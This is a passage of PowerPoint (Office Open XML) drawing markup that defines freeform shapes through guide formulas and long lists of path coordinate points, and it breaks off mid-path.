                  <a:gd name="T42" fmla="*/ 0 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 125"/>
                  <a:gd name="T44" fmla="*/ 0 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 125"/>
                  <a:gd name="T46" fmla="*/ 0 w 189"/>
                  <a:gd name="T47" fmla="*/ 0 h 125"/>
                  <a:gd name="T48" fmla="*/ 0 w 189"/>
                  <a:gd name="T49" fmla="*/ 0 h 125"/>
                  <a:gd name="T50" fmla="*/ 0 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 125"/>
                  <a:gd name="T52" fmla="*/ 0 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 125"/>
                  <a:gd name="T54" fmla="*/ 0 w 189"/>
                  <a:gd name="T55" fmla="*/ 0 h 125"/>
                  <a:gd name="T56" fmla="*/ 0 w 189"/>
                  <a:gd name="T57" fmla="*/ 0 h 125"/>
                  <a:gd name="T58" fmla="*/ 0 w 189"/>
                  <a:gd name="T59" fmla="*/ 0 h 125"/>
                  <a:gd name="T60" fmla="*/ 0 w 189"/>
                  <a:gd name="T61" fmla="*/ 0 h 125"/>
                  <a:gd name="T62" fmla="*/ 0 w 189"/>
                  <a:gd name="T63" fmla="*/ 0 h 125"/>
                  <a:gd name="T64" fmla="*/ 0 w 189"/>
                  <a:gd name="T65" fmla="*/ 0 h 125"/>
                  <a:gd name="T66" fmla="*/ 0 w 189"/>
                  <a:gd name="T67" fmla="*/ 0 h 125"/>
                  <a:gd name="T68" fmla="*/ 0 w 189"/>
                  <a:gd name="T69" fmla="*/ 0 h 125"/>
                  <a:gd name="T70" fmla="*/ 0 w 189"/>
                  <a:gd name="T71" fmla="*/ 0 h 125"/>
                  <a:gd name="T72" fmla="*/ 0 w 189"/>
                  <a:gd name="T73" fmla="*/ 0 h 125"/>
                  <a:gd name="T74" fmla="*/ 0 w 189"/>
                  <a:gd name="T75" fmla="*/ 0 h 125"/>
                  <a:gd name="T76" fmla="*/ 0 w 189"/>
                  <a:gd name="T77" fmla="*/ 0 h 125"/>
                  <a:gd name="T78" fmla="*/ 0 w 189"/>
                  <a:gd name="T79" fmla="*/ 0 h 125"/>
                  <a:gd name="T80" fmla="*/ 0 w 189"/>
                  <a:gd name="T81" fmla="*/ 0 h 125"/>
                  <a:gd name="T82" fmla="*/ 0 w 189"/>
                  <a:gd name="T83" fmla="*/ 0 h 125"/>
                  <a:gd name="T84" fmla="*/ 0 w 189"/>
                  <a:gd name="T85" fmla="*/ 0 h 125"/>
                  <a:gd name="T86" fmla="*/ 0 w 189"/>
                  <a:gd name="T87" fmla="*/ 0 h 125"/>
                  <a:gd name="T88" fmla="*/ 0 w 189"/>
                  <a:gd name="T89" fmla="*/ 0 h 125"/>
                  <a:gd name="T90" fmla="*/ 0 w 189"/>
                  <a:gd name="T91" fmla="*/ 0 h 125"/>
                  <a:gd name="T92" fmla="*/ 0 w 189"/>
                  <a:gd name="T93" fmla="*/ 0 h 125"/>
                  <a:gd name="T94" fmla="*/ 0 w 189"/>
                  <a:gd name="T95" fmla="*/ 0 h 125"/>
                  <a:gd name="T96" fmla="*/ 0 w 189"/>
                  <a:gd name="T97" fmla="*/ 0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9"/>
                  <a:gd name="T148" fmla="*/ 0 h 125"/>
                  <a:gd name="T149" fmla="*/ 189 w 189"/>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9" h="125">
                    <a:moveTo>
                      <a:pt x="189" y="93"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="9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087" name="Freeform 93"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="479" y="2421"/>
                <a:ext cx="61" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 187"/>
                  <a:gd name="T1" fmla="*/ 0 h 112"/>
                  <a:gd name="T2" fmla="*/ 0 w 187"/>
                  <a:gd name="T3" fmla="*/ 0 h 112"/>
                  <a:gd name="T4" fmla="*/ 0 w 187"/>
                  <a:gd name="T5" fmla="*/ 0 h 112"/>
                  <a:gd name="T6" fmla="*/ 0 w 187"/>
                  <a:gd name="T7" fmla="*/ 0 h 112"/>
                  <a:gd name="T8" fmla="*/ 0 w 187"/>
                  <a:gd name="T9" fmla="*/ 0 h 112"/>
                  <a:gd name="T10" fmla="*/ 0 w 187"/>
                  <a:gd name="T11" fmla="*/ 0 h 112"/>
                  <a:gd name="T12" fmla="*/ 0 w 187"/>
                  <a:gd name="T13" fmla="*/ 0 h 112"/>
                  <a:gd name="T14" fmla="*/ 0 w 187"/>
                  <a:gd name="T15" fmla="*/ 0 h 112"/>
                  <a:gd name="T16" fmla="*/ 0 w 187"/>
                  <a:gd name="T17" fmla="*/ 0 h 112"/>
                  <a:gd name="T18" fmla="*/ 0 w 187"/>
                  <a:gd name="T19" fmla="*/ 0 h 112"/>
                  <a:gd name="T20" fmla="*/ 0 w 187"/>
                  <a:gd name="T21" fmla="*/ 0 h 112"/>
                  <a:gd name="T22" fmla="*/ 0 w 187"/>
                  <a:gd name="T23" fmla="*/ 0 h 112"/>
                  <a:gd name="T24" fmla="*/ 0 w 187"/>
                  <a:gd name="T25" fmla="*/ 0 h 112"/>
                  <a:gd name="T26" fmla="*/ 0 w 187"/>
                  <a:gd name="T27" fmla="*/ 0 h 112"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 0 h 112"/>
                  <a:gd name="T30" fmla="*/ 0 w 187"/>
                  <a:gd name="T31" fmla="*/ 0 h 112"/>
                  <a:gd name="T32" fmla="*/ 0 w 187"/>
                  <a:gd name="T33" fmla="*/ 0 h 112"/>
                  <a:gd name="T34" fmla="*/ 0 w 187"/>
                  <a:gd name="T35" fmla="*/ 0 h 112"/>
                  <a:gd name="T36" fmla="*/ 0 w 187"/>
                  <a:gd name="T37" fmla="*/ 0 h 112"/>
                  <a:gd name="T38" fmla="*/ 0 w 187"/>
                  <a:gd name="T39" fmla="*/ 0 h 112"/>
                  <a:gd name="T40" fmla="*/ 0 w 187"/>
                  <a:gd name="T41" fmla="*/ 0 h 112"/>
                  <a:gd name="T42" fmla="*/ 0 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 112"/>
                  <a:gd name="T44" fmla="*/ 0 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 112"/>
                  <a:gd name="T46" fmla="*/ 0 w 187"/>
                  <a:gd name="T47" fmla="*/ 0 h 112"/>
                  <a:gd name="T48" fmla="*/ 0 w 187"/>
                  <a:gd name="T49" fmla="*/ 0 h 112"/>
                  <a:gd name="T50" fmla="*/ 0 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 112"/>
                  <a:gd name="T52" fmla="*/ 0 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 112"/>
                  <a:gd name="T54" fmla="*/ 0 w 187"/>
                  <a:gd name="T55" fmla="*/ 0 h 112"/>
                  <a:gd name="T56" fmla="*/ 0 w 187"/>
                  <a:gd name="T57" fmla="*/ 0 h 112"/>
                  <a:gd name="T58" fmla="*/ 0 w 187"/>
                  <a:gd name="T59" fmla="*/ 0 h 112"/>
                  <a:gd name="T60" fmla="*/ 0 w 187"/>
                  <a:gd name="T61" fmla="*/ 0 h 112"/>
                  <a:gd name="T62" fmla="*/ 0 w 187"/>
                  <a:gd name="T63" fmla="*/ 0 h 112"/>
                  <a:gd name="T64" fmla="*/ 0 w 187"/>
                  <a:gd name="T65" fmla="*/ 0 h 112"/>
                  <a:gd name="T66" fmla="*/ 0 w 187"/>
                  <a:gd name="T67" fmla="*/ 0 h 112"/>
                  <a:gd name="T68" fmla="*/ 0 w 187"/>
                  <a:gd name="T69" fmla="*/ 0 h 112"/>
                  <a:gd name="T70" fmla="*/ 0 w 187"/>
                  <a:gd name="T71" fmla="*/ 0 h 112"/>
                  <a:gd name="T72" fmla="*/ 0 w 187"/>
                  <a:gd name="T73" fmla="*/ 0 h 112"/>
                  <a:gd name="T74" fmla="*/ 0 w 187"/>
                  <a:gd name="T75" fmla="*/ 0 h 112"/>
                  <a:gd name="T76" fmla="*/ 0 w 187"/>
                  <a:gd name="T77" fmla="*/ 0 h 112"/>
                  <a:gd name="T78" fmla="*/ 0 w 187"/>
                  <a:gd name="T79" fmla="*/ 0 h 112"/>
                  <a:gd name="T80" fmla="*/ 0 w 187"/>
                  <a:gd name="T81" fmla="*/ 0 h 112"/>
                  <a:gd name="T82" fmla="*/ 0 w 187"/>
                  <a:gd name="T83" fmla="*/ 0 h 112"/>
                  <a:gd name="T84" fmla="*/ 0 w 187"/>
                  <a:gd name="T85" fmla="*/ 0 h 112"/>
                  <a:gd name="T86" fmla="*/ 0 w 187"/>
                  <a:gd name="T87" fmla="*/ 0 h 112"/>
                  <a:gd name="T88" fmla="*/ 0 w 187"/>
                  <a:gd name="T89" fmla="*/ 0 h 112"/>
                  <a:gd name="T90" fmla="*/ 0 w 187"/>
                  <a:gd name="T91" fmla="*/ 0 h 112"/>
                  <a:gd name="T92" fmla="*/ 0 w 187"/>
                  <a:gd name="T93" fmla="*/ 0 h 112"/>
                  <a:gd name="T94" fmla="*/ 0 w 187"/>
                  <a:gd name="T95" fmla="*/ 0 h 112"/>
                  <a:gd name="T96" fmla="*/ 0 w 187"/>
                  <a:gd name="T97" fmla="*/ 0 h 112"/>
                  <a:gd name="T98" fmla="*/ 0 w 187"/>
                  <a:gd name="T99" fmla="*/ 0 h 112"/>
                  <a:gd name="T100" fmla="*/ 0 w 187"/>
                  <a:gd name="T101" fmla="*/ 0 h 112"/>
                  <a:gd name="T102" fmla="*/ 0 w 187"/>
                  <a:gd name="T103" fmla="*/ 0 h 112"/>
                  <a:gd name="T104" fmla="*/ 0 w 187"/>
                  <a:gd name="T105" fmla="*/ 0 h 112"/>
                  <a:gd name="T106" fmla="*/ 0 w 187"/>
                  <a:gd name="T107" fmla="*/ 0 h 112"/>
                  <a:gd name="T108" fmla="*/ 0 w 187"/>
                  <a:gd name="T109" fmla="*/ 0 h 112"/>
                  <a:gd name="T110" fmla="*/ 0 w 187"/>
                  <a:gd name="T111" fmla="*/ 0 h 112"/>
                  <a:gd name="T112" fmla="*/ 0 w 187"/>
                  <a:gd name="T113" fmla="*/ 0 h 112"/>
                  <a:gd name="T114" fmla="*/ 0 w 187"/>
                  <a:gd name="T115" fmla="*/ 0 h 112"/>
                  <a:gd name="T116" fmla="*/ 0 w 187"/>
                  <a:gd name="T117" fmla="*/ 0 h 112"/>
                  <a:gd name="T118" fmla="*/ 0 w 187"/>
                  <a:gd name="T119" fmla="*/ 0 h 1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7"/>
                  <a:gd name="T181" fmla="*/ 0 h 112"/>
                  <a:gd name="T182" fmla="*/ 187 w 187"/>
                  <a:gd name="T183" fmla="*/ 112 h 11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7" h="112">
                    <a:moveTo>
                      <a:pt x="0" y="80"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
